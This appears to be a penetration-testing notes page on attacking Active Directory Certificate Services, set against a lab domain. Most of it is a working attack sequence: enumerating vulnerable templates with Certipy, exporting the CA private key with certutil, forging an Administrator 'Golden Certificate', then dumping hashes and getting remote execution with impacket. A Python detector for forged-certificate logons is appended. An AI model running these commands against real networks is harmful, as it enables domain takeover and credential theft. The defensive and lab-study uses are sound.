AD Certificates

See HERE.

A CA (Certification Authority) is part of the Active Directory Certificate Services (AD CS).

A CA is installed when the organization wants to use:

  • Authentication via certificates (Kerberos authentication with certificate (PKINIT) instead of using passwords/hashes)

  • Smart cards, VPN certificates, corporate Wi-Fi

  • Single Sign-On with certificates

  • Or when certificates are needed for machines/users/services

Identification

Use Certipy to enumerate AD CS and identify vulnerable templates:

certipy find -u user -p pass -dc-ip 10.10.10.1 -stdout
certipy find -vulnerable -u <USER>@<DOMAIN> -p <PASSWORD> -dc-ip <DC> -stdout

Attacks

Golden Certificate

If you compromise the CA (obtain its certificate and private key as a .pfx), you can:

  • Sign a certificate for Administrator yourself

  • Use it to obtain a TGT via PKINIT

  • Access the domain as that account

If you have read access to the disk, from the Windows victim (the CA host), locate the CA certificate in the machine store:

certutil -store My
# find "Certificate Type: CA" and note the "Serial Number" or "Subject"

Export it, with its private key, as a .pfx:

certutil -exportPFX My "<Serial_Number>" .\ca.pfx

Use Certipy from Linux to craft the Golden Certificate.

Sync your clock with the DC first (Kerberos rejects large clock skew): sudo ntpdate <DC_IP>

# Generate a .pfx file signed by your compromised CA.
certipy forge -ca-pfx ca.pfx -upn Administrator@certificate.htb -subject 'CN=ADMINISTRATOR,CN=USERS,DC=CERTIFICATE,DC=HTB' -out adm_cert.pfx
# Authenticate with the certificate you created (Kerberos + PKINIT) and get TGT (.ccache file) and NTLM HASH!
certipy auth -pfx adm_cert.pfx -dc-ip <IP_DC>
# Use the .ccache ticket
export KRB5CCNAME=administrator.ccache
impacket-secretsdump -k -no-pass -target-ip <DC_IP> -dc-ip <DC_IP> certificate.htb/Administrator@DC01.certificate.htb
impacket-smbclient -k -no-pass -target-ip <DC_IP> -dc-ip <DC_IP> certificate.htb/Administrator@DC01.certificate.htb
impacket-wmiexec -k -no-pass -target-ip <DC_IP> -dc-ip <DC_IP> certificate.htb/Administrator@DC01.certificate.htb
impacket-psexec -k -no-pass -target-ip <DC_IP> -dc-ip <DC_IP> certificate.htb/Administrator@DC01.certificate.htb
...
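A detection-side counterpart, added here as an example (it is not part of the original page or of Certipy): a forged certificate is signed with the CA key but never passes through the CA database, so a PKINIT logon (Windows security event 4768, which records the certificate issuer name, serial number and thumbprint) whose serial the CA never issued is a strong indicator. The 4768 lines and the issued-serial list below are constructed samples with a simplified field layout, and the CA name `certificate-DC01-CA` is assumed.

```python
import re
from dataclasses import dataclass

# Constructed sample: simplified 4768 (TGT request) events as exported text.
# Real events carry many more fields; only the ones used here are included.
SAMPLE_4768_EVENTS = """\
EventID=4768 AccountName=alice CertificateIssuerName=certificate-DC01-CA CertificateSerialNumber=1A0000000012 CertificateThumbprint=ab12
EventID=4768 AccountName=bob CertificateIssuerName= CertificateSerialNumber= CertificateThumbprint=
EventID=4768 AccountName=Administrator CertificateIssuerName=certificate-DC01-CA CertificateSerialNumber=7F3C9A11BEEF CertificateThumbprint=cd34
"""

# Constructed sample: serial numbers the CA actually issued (what the CA
# database, e.g. a certutil -view export on the CA, would list).
SAMPLE_ISSUED_SERIALS = ["1A0000000012", "1A0000000013"]

EVENT_RE = re.compile(r"(\w+)=(\S*)")

@dataclass
class PkinitLogon:
    account: str
    issuer: str
    serial: str

def parse_4768(text):
    """Return certificate-based 4768 logons; password logons have empty certificate fields."""
    logons = []
    for line in text.splitlines():
        fields = dict(EVENT_RE.findall(line))
        if fields.get("EventID") != "4768" or not fields.get("CertificateSerialNumber"):
            continue
        logons.append(PkinitLogon(fields["AccountName"], fields["CertificateIssuerName"],
                                  fields["CertificateSerialNumber"].upper()))
    return logons

def find_unissued_certificates(events_text, issued_serials, ca_name):
    """Flag certificate logons that name our CA as issuer but whose serial is absent from the CA database."""
    issued = {s.upper() for s in issued_serials}
    return [logon for logon in parse_4768(events_text)
            if logon.issuer == ca_name and logon.serial not in issued]

if __name__ == "__main__":
    for hit in find_unissued_certificates(SAMPLE_4768_EVENTS, SAMPLE_ISSUED_SERIALS, "certificate-DC01-CA"):
        print(f"ALERT: {hit.account} authenticated with serial {hit.serial}, not present in the CA database")
```

A serial missing from the CA database means the certificate was signed outside the normal issuance path, which is exactly what a stolen CA key makes possible; the same comparison also catches certificates removed from the database to hide their tracks.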

Account Persistence

Domain Escalation (see also here)

Domain Persistence

Certificate Theft
